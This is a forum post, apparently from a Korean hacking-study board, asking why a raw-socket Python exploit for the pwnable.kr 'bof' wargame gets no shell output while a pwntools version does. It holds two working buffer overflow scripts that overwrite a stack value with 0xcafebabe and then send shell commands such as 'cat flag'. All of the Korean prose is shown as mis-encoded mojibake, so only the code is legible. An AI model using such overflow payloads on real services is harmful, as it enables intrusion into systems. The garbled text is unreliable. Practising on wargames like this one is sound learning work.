|
http://www.hackerschool.org/HS_Boards/zboard.php?AllArticle=true&no=1987 [º¹»ç]
¾È³çÇϼ¼¿ä.
pwnable.kr¿¡¼ ¹®Á¦¸¦ Ǫ´Âµ¥ pwntools ¹è¿ì±â ±ÍÂú°í ÇØ¼ ±×³É socket ¸ðµâ·Î Çߴµ¥ ¿Ö ÀÌÈÄ¿¡ ¸í·É¾î¸¦ ¸Ô´Â ºÎºÐ¿¡¼ ´Ù¸¥°É±î¿ä.
bof ¹®Á¦¸¦ ±â¹ÝÇÏ¿© ¿¹¸¦ µé¾îº¸°Ú½À´Ï´Ù.
Á¦°¡ óÀ½¿¡ Çß´ø °ÍÀº À©µµ¿ì¿¡¼ ÆÄÀ̽ã 3À» °¡Áö°í ¾Æ·¡ ÇÁ·Î±×·¥À» ½è½À´Ï´Ù.
import socket
X = socket.socket()
X.connect(("pwnable.kr",9000))
payload = "A"*0x34 + "\xbe\xba\xfe\xca" + '\n'
X.sendall(payload.encode())
X.sendall("id\n".encode())
print(X.recv(0x100))
±×·±µ¥ ÀÌ·¸°Ô µÇ¸é id ¸í·É¾îÀÇ °á°ú°¡ Àü´ÞÀÌ ¾ÈµË´Ï´Ù.
±×·±µ¥ ¾Æ·¡Ã³·³ ÀÎÅͳݿ¡ µ¹¾Æ´Ù´Ï´Â ¼Ò½º´Â ÀÌ·±°Ô µË´Ï´Ù.
from pwn import *
r = remote("pwnable.kr", 9000)
payload = "D"*52 + "\xbe\xba\xfe\xca"
r.sendline( payload )
r.sendline('ls')
print(r.recv())
r.sendline('cat flag')
print(r.recv())
r.close()
Ãâó: https://mandu-mandu.tistory.com/71
ÀÌ ¹®Á¦ ¸»°íµµ nc¸¦ »ç¿ëÇÏ´Â ¹®Á¦ ¿©·¯°³°¡ ´Ù ÀÌ·± Çö»óÀ» ³ªÅ¸³»´Âµ¥,
pwnÀ» ±¸ÇöÇÒ ¶§ ¹«¾ùÀ» ÇØÁÖ¾î¼ ÀÌ°Ô µÇ´Â°É±î¿ä?
¼ÖÁ÷È÷ pwntools ±êÇãºêµµ Çѹø ¶â¾îº¸°í Çߴµ¥ µµ¹«Áö ¸ð¸£°Ú½À´Ï´Ù. |
Hit : 3334 Date : 2020/01/09 01:38
|